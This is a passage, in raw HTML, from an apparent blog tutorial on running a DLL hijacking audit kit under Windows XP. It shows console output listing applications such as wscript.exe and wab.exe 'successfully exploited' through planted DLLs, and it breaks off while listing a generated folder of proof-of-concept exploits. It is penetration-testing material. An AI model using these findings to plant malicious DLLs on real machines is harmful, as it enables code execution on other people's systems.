class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: ncb<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: nfo<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: nls<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: nmw<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: nsc<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: nvr<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: nws<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: obj<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: ocx<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: oc_<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: odc<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: otf<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: p10<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: p12<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: p7b<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: p7c<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: p7m<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: p7r<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: p7s<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: pbk<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: pch<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: pdb<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: pds<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: pfm<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: pfx<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: php3<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: pic<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: pko<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: plg<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: pma<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: pmr<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: pmw<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: pnf<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: png<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: pot<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: ppi<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: pps<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: ppt<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: prf<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: <span class=\"kw2\">ps<\/span><br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: psd<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: psw<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: qds<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: rat<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: rc<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: rdp<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: reg<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: res<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: rle<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: rmi<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: rnk<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: rpc<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: rsp<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: rtf<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: sam<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: sbr<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: sc2<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: scf<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: <span class=\"kw2\">scp<\/span><br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: sct<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: sdb<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: <span class=\"kw2\">sed<\/span><br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: shb<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: shs<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: shtml<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: shw<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: sit<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: snd<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: spc<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: spl<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: sql<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: sr_<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: sst<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: stl<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: stm<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: swf<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: sym<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: sy_<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: <span class=\"kw2\">tar<\/span><br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: text<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: tgz<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: theme<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: tif<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: tiff<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: tlb<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: tsp<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: tsv<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: ttc<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: ttf<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: txt<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: udl<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: uls<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: url<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: vbe<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: vbs<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: vbx<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: vcf<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: vxd<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: wab<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: wav<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: wax<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: wb2<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: webpnp<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: wht<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: wk4<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: wll<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: wlt<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: wm<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: wma<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: wmd<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: wmdb<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: wmf<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: wmp<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: wms<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: wmv<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: wmx<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: wmz<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: wpd<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: wpg<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: wpl<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: wri<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: wsc<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: wsf<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: wsh<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: wsz<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: wtx<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: wvx<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: x<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: xbm<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: xix<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: xlb<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: xlc<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: xls<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: xlt<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: xml<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: xsl<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: z<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: z96<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: zap<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: zfsendtotarget<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Auditing extension: <span class=\"kw2\">zip<\/span><br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Data collection phase <span class=\"kw3\">complete<\/span>, <span class=\"kw3\">export<\/span> Logfile.CSV from ProcMon.<br \/>\nC:\\Documents and Settings\\Administrator\\Desktop\\DLLHijackAuditKit<span class=\"sy0\">&gt;<\/span>pause<br \/>\nPress any key to <span class=\"kw3\">continue<\/span> . . .<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>After 30minutes or so the first bash script will have completed<br \/>\nOnce the code has completed you&#8217;ll possibly have a few extra windows open, simply close these but DO NOT CLOSE PROCESS MONITOR. In Process Monitor you&#8217;ll need to save the output as CSV; File&#8211;>Save.<br \/>\n<a href=\"http:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2011\/12\/dllhijackingsave.png\"><img loading=\"lazy\" src=\"http:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2011\/12\/dllhijackingsave-150x150.png\" alt=\"\" title=\"dllhijackingsave\" width=\"150\" height=\"150\" class=\"aligncenter size-thumbnail wp-image-295\" \/><\/a><br \/>\nSave the file inside the DLLHijackingAuditKit folder as Logfile.csv. This file will be imported by 02_Analyze.bat with nice results. To do this simply run the following command:<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;height:300px;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/>10<br \/>11<br \/>12<br \/>13<br \/>14<br \/>15<br \/>16<br \/>17<br \/>18<br \/>19<br \/>20<br \/>21<br \/>22<br \/>23<br \/>24<br \/>25<br \/>26<br \/>27<br \/>28<br \/>29<br \/>30<br \/>31<br \/>32<br \/>33<br \/>34<br \/>35<br \/><\/div><\/td><td><div class=\"bash codecolorer\">C:\\Documents and Settings\\Administrator\\Desktop\\DLLHijackAuditKit<span class=\"sy0\">&gt;<\/span>02_Analyze.bat<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Protecting <span class=\"nu0\">30<\/span> processes<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Generating and validating <span class=\"kw3\">test<\/span> cases...<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> &nbsp;Application: rundll32.exe<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> &nbsp;Application: msimn.exe<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> &nbsp;Application: grpconv.exe<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Successfully exploited grpconv.exe with .grp using imm.dll<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> &nbsp;Application: isignup.exe<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> &nbsp;Application: wscript.exe<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Successfully exploited wscript.exe with .js using wsheng.dll<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Successfully exploited wscript.exe with .js using wshen.dll<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Successfully exploited wscript.exe with .js using wshenu.dll<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Successfully exploited wscript.exe with .jse using wsheng.dll<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Successfully exploited wscript.exe with .jse using wshen.dll<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Successfully exploited wscript.exe with .jse using wshenu.dll<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Successfully exploited wscript.exe with .vbe using wsheng.dll<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Successfully exploited wscript.exe with .vbe using wshen.dll<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Successfully exploited wscript.exe with .vbe using wshenu.dll<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Successfully exploited wscript.exe with .vbs using wsheng.dll<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Successfully exploited wscript.exe with .vbs using wshen.dll<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Successfully exploited wscript.exe with .vbs using wshenu.dll<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Successfully exploited wscript.exe with .wsf using wsheng.dll<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Successfully exploited wscript.exe with .wsf using wshen.dll<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Successfully exploited wscript.exe with .wsf using wshenu.dll<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Successfully exploited wscript.exe with .wsh using wsheng.dll<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Successfully exploited wscript.exe with .wsh using wshen.dll<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Successfully exploited wscript.exe with .wsh using wshenu.dll<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> &nbsp;Application: mplay32.exe<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> &nbsp;Application: moviemk.exe<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> &nbsp;Application: wab.exe<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Successfully exploited wab.exe with .p7c using wab32res.dll<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Successfully exploited wab.exe with .vcf using wab32res.dll<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Successfully exploited wab.exe with .wab using wab32res.dll<br \/>\nC:\\Documents and Settings\\Administrator\\Desktop\\DLLHijackAuditKit<span class=\"sy0\">&gt;<\/span>pause<br \/>\nPress any key to <span class=\"kw3\">continue<\/span> . . .<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>Once complete you&#8217;ll have a directory called Exploits and this contain proof of concept code for each vulnerable application.<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;height:300px;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/>10<br \/>11<br \/>12<br \/>13<br \/>14<br \/>15<br \/>16<br \/>17<br \/>18<br \/>19<br \/>20<br \/>21<br \/>22<br \/>23<br \/>24<br \/>25<br \/>26<br \/>27<br \/>28<br \/>29<br \/>30<br \/>31<br \/><\/div><\/td><td><div class=\"bash codecolorer\">C:\\Documents and Settings\\Administrator\\Desktop\\DLLHijackAuditKit\\Exploits<span class=\"sy0\">&gt;<\/span><span class=\"kw2\">dir<\/span><br \/>\n&nbsp;Volume <span class=\"kw1\">in<\/span> drive C has no label.<br \/>\n&nbsp;Volume Serial Number is <span class=\"nu0\">8897<\/span>-ECF4<br \/>\n&nbsp;Directory of C:\\Documents and Settings\\Administrator\\Desktop\\DLLHijackAuditKit\\<br \/>\nExploits<br \/>\n<span class=\"nu0\">19<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">12<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">2011<\/span> &nbsp;<span class=\"nu0\">20<\/span>:<span class=\"nu0\">47<\/span> &nbsp; &nbsp;<span class=\"sy0\">&lt;<\/span>DIR<span class=\"sy0\">&gt;<\/span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;.<br \/>\n<span class=\"nu0\">19<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">12<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">2011<\/span> &nbsp;<span class=\"nu0\">20<\/span>:<span class=\"nu0\">47<\/span> &nbsp; &nbsp;<span class=\"sy0\">&lt;<\/span>DIR<span class=\"sy0\">&gt;<\/span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;..<br \/>\n<span class=\"nu0\">19<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">12<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">2011<\/span> &nbsp;<span class=\"nu0\">20<\/span>:<span class=\"nu0\">46<\/span> &nbsp; &nbsp;<span class=\"sy0\">&lt;<\/span>DIR<span class=\"sy0\">&gt;<\/span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;grpconv.exe_grp_imm.dll<br \/>\n<span class=\"nu0\">19<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">12<\/span><span class=\"sy0\">\/<\/span><span 